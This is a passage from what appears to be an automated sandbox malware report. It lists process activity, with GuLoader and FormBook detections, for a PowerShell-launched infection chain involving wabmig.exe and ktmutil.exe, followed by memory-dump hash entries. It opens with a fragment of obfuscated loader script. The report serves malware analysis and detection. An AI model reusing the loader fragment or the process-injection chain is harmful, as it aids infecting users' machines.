noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;"
            Imagebase:0x1f0000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2218750416.000000000596A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2228656875.0000000008900000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2229243853.0000000009BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:08:45:19
            Start date:16/09/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:10
            Start time:08:45:38
            Start date:16/09/2024
            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
            Imagebase:0xe30000
            File size:66'048 bytes
            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:true

            Target ID:11
            Start time:08:46:03
            Start date:16/09/2024
            Path:C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe"
            Imagebase:0x9c0000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            Target ID:12
            Start time:08:46:06
            Start date:16/09/2024
            Path:C:\Windows\SysWOW64\ktmutil.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
            Imagebase:0x990000
            File size:15'360 bytes
            MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:false

            Target ID:14
            Start time:08:46:18
            Start date:16/09/2024
            Path:C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe"
            Imagebase:0x9c0000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            Target ID:15
            Start time:08:46:25
            Start date:16/09/2024
            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
            Imagebase:0xe30000
            File size:66'048 bytes
            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:16
            Start time:08:46:30
            Start date:16/09/2024
            Path:C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase:0x7ff6bf500000
            File size:676'768 bytes
            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:17
            Start time:08:46:33
            Start date:16/09/2024
            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
            Imagebase:0xe30000
            File size:66'048 bytes
            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l$(f*l
              • API String ID: 0-792637747
              • Opcode ID: 8d034edda8169f6c5bb559a3cdc8241fe4feef69dcc1f6bce0416f94a0c128b2
              • Instruction ID: 5796b16ad25f9458f76e37c9ffa0e24aa11d3810b5e133c4aaae9cc7dd2014ca
              • Opcode Fuzzy Hash: 8d034edda8169f6c5bb559a3cdc8241fe4feef69dcc1f6bce0416f94a0c128b2
              • Instruction Fuzzy Hash: 15B183B4A00205DFDB30CF94C481BAAF7B2BF85754F24C969DA16AB754CB32E846CB51
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: Hbq$$^q$$^q
              • API String ID: 0-1611274095
              • Opcode ID: 40cf26f618ec2d62dddaf01c621f9159e7595b24e2751aa02f9cf19516be595b
              • Instruction ID: 7931795a74064ceece6a75284869711cac6fc48fac66fc1c53b82081df507e68
              • Opcode Fuzzy Hash: 40cf26f618ec2d62dddaf01c621f9159e7595b24e2751aa02f9cf19516be595b
              • Instruction Fuzzy Hash: 22222E307006189FDB25DB68D854AAEB7B2BF89304F1445A9D80AEB361DF35ED85CF81
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l
              • API String ID: 0-1649080014
              • Opcode ID: 686b794a356523eb64824ee3b84bceebd2e5cadde5439021910acbe5a4ed326c
              • Instruction ID: a6cf3bba0b418c70c61ad79b32b9c9c3cdbebdabdcc030137fd9c47cffc39126
              • Opcode Fuzzy Hash: 686b794a356523eb64824ee3b84bceebd2e5cadde5439021910acbe5a4ed326c
              • Instruction Fuzzy Hash: 6E0291B4A00204DFD724DB58C951F9ABBB2BF89344F14C4A9DA05AB756CB72EC82CF51
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$$^q
              • API String ID: 0-953868773
              • Opcode ID: f179b90dce2f3ac67880f59f3bbf48005baff29724acf4413251aa18d7567ed7
              • Instruction ID: db8b1abd0f48aa1dca7f09a32dce953c8268a28c6d03b8d66dced22ff58b134a
              • Opcode Fuzzy Hash: f179b90dce2f3ac67880f59f3bbf48005baff29724acf4413251aa18d7567ed7
              • Instruction Fuzzy Hash: FDA129B0B043459FCB259A7888157BA7BE6AF86390F1488BAD541CF392DA35DC45C3E3
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q
              • API String ID: 0-1196845430
              • Opcode ID: 7157a5d0b84875c13037fe65864087b53ed3049038f0800f1baae926f3d972bf
              • Instruction ID: b468db0f96d9012156895e01698851800f4009ba4694d333d5d6183376116cae
              • Opcode Fuzzy Hash: 7157a5d0b84875c13037fe65864087b53ed3049038f0800f1baae926f3d972bf
              • Instruction Fuzzy Hash: 19B191B4A002099FCB24CF64C945B9EBBB2EF88344F15C469D905AF755CB31EC86CB91
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q$$^q
              • API String ID: 0-831282457
              • Opcode ID: 0d5d822afbe93ec7428298bd09ada8b15a305577f8547a2e2886b648dfdccc2a
              • Instruction ID: e284973fbab4dbdad830844bc2b57e715df8cb9072dea38e25f73d40a4348385
              • Opcode Fuzzy Hash: 0d5d822afbe93ec7428298bd09ada8b15a305577f8547a2e2886b648dfdccc2a
              • Instruction Fuzzy Hash: 624148B2F002599FCB34AE799C007ABFBE5AF85654B24882AD805EB305DF31D945C7E1
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q
              • API String ID: 0-355816377
              • Opcode ID: 7267e00b39cead74b2afb98c48638a07a0f5fe32059c0b8576b4a2f9001214e5
              • Instruction ID: 3bf7ca6ccd036a47ab61f6503e9a75bc9a1588b902246eb3dd1ead55924010f0
              • Opcode Fuzzy Hash: 7267e00b39cead74b2afb98c48638a07a0f5fe32059c0b8576b4a2f9001214e5
              • Instruction Fuzzy Hash: 4B2103B6E042599FCB358E6488407EBBBF0AF46650B294867CC08EB202E7349C44C7E1
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l
              • API String ID: 0-603393540
              • Opcode ID: d4866ca8bb0197a072cd8bdf0ef1f60f1f6d27599bd1a2523984b04c18067ce8
              • Instruction ID: 0e79b944ee5d4064c3d79cc345476ae9b8ecdea30908cd38670b2e01ae700d07
              • Opcode Fuzzy Hash: d4866ca8bb0197a072cd8bdf0ef1f60f1f6d27599bd1a2523984b04c18067ce8
              • Instruction Fuzzy Hash: AE225CB4A10205AFD724CF58C585FA9BBB2BF89354F15C06AE805AF355CB72EC42CB91
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l
              • API String ID: 0-603393540
              • Opcode ID: 4e91d8f31ebdd5f943eeef73259e29bd5e8c92ea23622c90f3bbc17d03faab8c
              • Instruction ID: dd78e0497046a02aed1413178e8c4e968e4ba041886bceac904811d12d3e399d
              • Opcode Fuzzy Hash: 4e91d8f31ebdd5f943eeef73259e29bd5e8c92ea23622c90f3bbc17d03faab8c
              • Instruction Fuzzy Hash: ECF16DB4A10205AFD724CF98C581FA9BBB2BF85354F14C46AE905AF355CB72EC42CB91
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: 5a6ba647344da35f4dff26591d9374dc243d9d88c77c824541e73b0ec2cfb32d
              • Instruction ID: 5bcd0a176a5678682907c39ad42ea89566c2adb4f48bd63bf11559b412a430a4
              • Opcode Fuzzy Hash: 5a6ba647344da35f4dff26591d9374dc243d9d88c77c824541e73b0ec2cfb32d
              • Instruction Fuzzy Hash: 0441D2B0A142069FCF348E74C545BBA7BEAAF44290F1888B6D9059F251DB35EC45C7E3
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f47ead893924940a38a459f28ce2fae8c32f0c0fba97740e14c12bd1622f2992
              • Instruction ID: f2d4fffac9e4e0adf68c116a313b4db56f06ea439d58a616896f8b9a61502a4b
              • Opcode Fuzzy Hash: f47ead893924940a38a459f28ce2fae8c32f0c0fba97740e14c12bd1622f2992
              • Instruction Fuzzy Hash: 40228D70A052489FCB06CF68D4949ADFBB1BF49310F25C69AE844EB366C735EC46CB90
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 577810c9ae3970114c143a78a228c66c1972f0498574124be290510acbae8674
              • Instruction ID: b5483ce5bb33a2644c93fec0a823a5470df7edcb43cbcd5845a5553692ea2e18
              • Opcode Fuzzy Hash: 577810c9ae3970114c143a78a228c66c1972f0498574124be290510acbae8674
              • Instruction Fuzzy Hash: 02E12634A002189FCB05CFA8D494A9DBBF2FF89714F248659E804EB365C731ED85CB90
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ab22bdaf4bbc4924f6dc709b2de25400260a1b6b25884f9c2c93c9644425726
              • Instruction ID: 887f7e0f21f145137589b4c6443f19cf1bb3f5dad44975d32e75761bb6ecc807
              • Opcode Fuzzy Hash: 7ab22bdaf4bbc4924f6dc709b2de25400260a1b6b25884f9c2c93c9644425726
              • Instruction Fuzzy Hash: 96D1E474A00209AFDB05CF98D584A9DBBB2FF88314F25C659E805EB365C735ED86CB90
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05403cbe8e363cb8ea7e659036cd9bf226489641fe816ef594e7948710528b45
              • Instruction ID: a706a4dbd5c2b53c3fda1da48dd89b5bc8df969b0d3b803469ac8ae9b103c8bc
              • Opcode Fuzzy Hash: 05403cbe8e363cb8ea7e659036cd9bf226489641fe816ef594e7948710528b45
              • Instruction Fuzzy Hash: ACC1A271A00248DFCB14DFA8D544A9DBBB6FF88314F158A99E806DB365DB34ED49CB80
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d9c61449a7accccd2c20abd4c70362946572ae6a372b2112547238ffc9bb469
              • Instruction ID: 290442431f6d87f8281134d83b4e2fbf5c2f88a7f48f07d16fdc411b6f30b979
              • Opcode Fuzzy Hash: 0d9c61449a7accccd2c20abd4c70362946572ae6a372b2112547238ffc9bb469
              • Instruction Fuzzy Hash: 64B12D70E002498FEB10CFA9C985BDDBBF2AF48314F148A2DD615E7294EB74E845CB91
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ef69b9b011f712815b79829d31acc9fdf85bb2a670d5776012d70cf7814c1fd
              • Instruction ID: 799b9edeab82336fcaecb6fa779b57a0a609e3e64d7cd18b7e554ce04f0cac9c
              • Opcode Fuzzy Hash: 3ef69b9b011f712815b79829d31acc9fdf85bb2a670d5776012d70cf7814c1fd
              • Instruction Fuzzy Hash: F981AE30A012449FCB15DFA4D8849ADBBF2FF89315F1989A9E405DB361DB35EC85CB50
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f6878a3248a02a1d34099b77cf5b7c7793ac8a1babcb25e240116d5eebeeacd0
              • Instruction ID: b5843fe2db33069ebd7f3719909f1840f43d4dd350c82e5bcffd199e7ed46849
              • Opcode Fuzzy Hash: f6878a3248a02a1d34099b77cf5b7c7793ac8a1babcb25e240116d5eebeeacd0
              • Instruction Fuzzy Hash: E8713B70A00258DFDB14DFA9D484AADBBF2FF88304F14896DD416AB290DB74EC86CB51
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 016893046a56dc70bc4251c2ed51875aef9ff9461708a508b7f75ffe5189c17d
              • Instruction ID: bc1137664f4606e0c23e33cef00b72d04e757f4d74719fdf6580110bf0246a4f
              • Opcode Fuzzy Hash: 016893046a56dc70bc4251c2ed51875aef9ff9461708a508b7f75ffe5189c17d
              • Instruction Fuzzy Hash: B9716E71E00219DFEB10CFA9D8807DDBBF2AF48314F148929DA14E7294EB74A846CB91
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 49fc0649624c6fc7eb591b0b58931a8a29d61129b85659461b80a72d6b582883
              • Instruction ID: 9fd18f5294eaa446b028bc633020c76bb00e5e106422dc4cfa74b4b39c86378d
              • Opcode Fuzzy Hash: 49fc0649624c6fc7eb591b0b58931a8a29d61129b85659461b80a72d6b582883
              • Instruction Fuzzy Hash: 01715171E00219DFEB14CFA9D84079DBBF2BF48314F14892DDA14E7294DB74A845CB91
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e02945a07bc81eb23d00b25761e9e9ea2eda7ba4e69ff603ff7390b13c6b9b4d
              • Instruction ID: 8e69442bd395253d0a83a268adad20fea6d98c59d5adb98642a1c2d29d4f1c94
              • Opcode Fuzzy Hash: e02945a07bc81eb23d00b25761e9e9ea2eda7ba4e69ff603ff7390b13c6b9b4d
              • Instruction Fuzzy Hash: 90515A70A00249CFCB25CFA8D494A9EBBB2FF84314F14896ED4559B651DB75EC46CB80
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8bf39f47806c242bafd06f191004f5efd64f9f37fcb508aeef72e71af8eecc23
              • Instruction ID: f1cb40349a678a2e9737789e96619f7f011402101262011c296d8e2cde7e92c5
              • Opcode Fuzzy Hash: 8bf39f47806c242bafd06f191004f5efd64f9f37fcb508aeef72e71af8eecc23
              • Instruction Fuzzy Hash: 14413BF0A043069FCB31AF648901BE97BB2AFD13C0F1AC8A6D9059F252E735D946C761
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea4921d0683f83a39b1651c37d155e14e767f1f09466bba28a84b2bedf2bbe9c
              • Instruction ID: 20c168d3b69b2fde7adb9c05aa476f4d1f9138af1bbc041150140dc065ce03ef
              • Opcode Fuzzy Hash: ea4921d0683f83a39b1651c37d155e14e767f1f09466bba28a84b2bedf2bbe9c
              • Instruction Fuzzy Hash: 78416B71A002449FDB24DF74C958AAD7BF2EF89714F0585ACE406EB7A0DB38AC41CB90
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db80ee878a44324732aecbf6fec6907641bb5736ed5ef39b87686151dd25f23d
              • Instruction ID: c912faa9bb87955c6432c851d14f313460a87e2c3df1d6aeef230fc6b8afb56c
              • Opcode Fuzzy Hash: db80ee878a44324732aecbf6fec6907641bb5736ed5ef39b87686151dd25f23d
              • Instruction Fuzzy Hash: 0F4139B4A006199FCB09CF59C5949BAFBB1FF48310B158A99D805AB364C736FC51CFA0
              Memory Dump Source
              • Source File: 00000006.00000002.2227450235.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_8460000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8bf066a5c8f956f7b16ccd13d0308514e2e51861d49808dbc04a796c3aa6f1f
              • Instruction ID: 01266b692bd92ff162a3ee8e211235cb6cc551f8ff20f6a43c78797f8b7c4886
              • Opcode Fuzzy Hash: d8bf066a5c8f956f7b16ccd13d0308514e2e51861d49808dbc04a796c3aa6f1f
              • Instruction Fuzzy Hash: 4D413A74E00209CFCB15CF99D5849AEBBB1FF88321B25866AD841AB364C731AC51CF90
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c870b693d4c0f58f5fba90dce89b7439476b5c6c5cb4c1e60ca97742860a149e
              • Instruction ID: 8da45f46f8d91f22dbcafb11197f43019392eaf4f7bc2648d0452fd19dc3d4ad
              • Opcode Fuzzy Hash: c870b693d4c0f58f5fba90dce89b7439476b5c6c5cb4c1e60ca97742860a149e
              • Instruction Fuzzy Hash: A6319574740208AFD7149BB8C955FAF7BA3AFC5340F108425E9026F795CE76AC468BD1
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d28b82c5b9ce38245e44e4808bac047db4fc6b580962ea06491c626499532412
              • Instruction ID: 7daf3107b627551663ec0aa506bd2f397e31e4dae214cc76baeee13337867fb5
              • Opcode Fuzzy Hash: d28b82c5b9ce38245e44e4808bac047db4fc6b580962ea06491c626499532412
              • Instruction Fuzzy Hash: 9C318F74A093958FC702DF6CD8A059ABFB0AF4A200B1584D7D484DB3A3C624E849C7A6
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d74aedf44192feaf191634511c395d61550a3dc9b5f1a3a89be32543223c5292
              • Instruction ID: f6d3486224186833c03140d0e221c81acc9c607dda9431c5906b52503123a4d4
              • Opcode Fuzzy Hash: d74aedf44192feaf191634511c395d61550a3dc9b5f1a3a89be32543223c5292
              • Instruction Fuzzy Hash: CC216EB171035AAFDB3469BE98447B7B6C99BC4791F14883AE505CB381CD75D845C360
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 30655995e994e72f1e4bfc1bd364642f0699a7acc3f77d22c4fa149c057749eb
              • Instruction ID: 8cea13b9fbf1d24d7e28e23756d2cdbc53f58b22c20aed9f8d87cd9bf3eadaa7
              • Opcode Fuzzy Hash: 30655995e994e72f1e4bfc1bd364642f0699a7acc3f77d22c4fa149c057749eb
              • Instruction Fuzzy Hash: 4C310B30A011189FCB25DB64D958AEEB7F2BF89304F1445E9D50AAB351DB35EE81CF81
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fa53e23355e23aba1a62156ba6a769b6d856cd7b28caa15a3a4a0d0b046f617
              • Instruction ID: 482c74182e187cdef503a62537a2bbeef613cee5bb279835bdc443f6739142b5
              • Opcode Fuzzy Hash: 7fa53e23355e23aba1a62156ba6a769b6d856cd7b28caa15a3a4a0d0b046f617
